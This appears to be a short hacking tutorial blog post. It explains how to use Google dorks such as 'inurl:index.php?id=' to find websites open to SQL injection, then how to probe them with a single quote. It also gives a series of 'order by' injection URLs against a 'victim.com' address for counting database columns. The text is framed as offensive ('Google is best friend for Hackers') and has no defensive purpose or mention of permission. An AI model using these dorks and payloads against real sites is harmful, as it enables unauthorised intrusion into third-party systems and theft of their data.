How To Find A Vulnerable Website ?

How To Find A Vulnerable Website ?

Google Web Search is a web search engine owned by Google Inc. Google is the world's best search engine. Google is best friend for Hackers. We can find the Vulnerable website using google search. This is known as Google Dorks.


List Of Google Dorks:
  • inurl:index.php?id=
  • inurl:gallery.php?id=
  • inurl:post.php?id=
  • inurl:article?id=
All use full Google Dork list:
Hack using Google dork. Find vulnerable websites using Google dork.

  • File Size : 22.26 KB

Copy one from above list and paste in google search box, hit enter You can see list of websites ending with that url for eg:

Go to that link. add ' (single quote) at the end of the url.
For eg:

Now hit enter. if the page remains in the same page,then it is not vulnerable website. If the page show any error or show blank page, then it is vulnerable website. Now let's check further. Remove single quote from url

Then add this "order by x" (without quotes)
replace the x with 0,1,2,....n.(until it show error page).


For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)


Now you can come to one conclusion is that website has 4 columns. Also it is vulnerable.
If the above method is not working,then try this:
http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5--(error)
if this is also not working,then try this:

http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5--(error)

ENJOY...!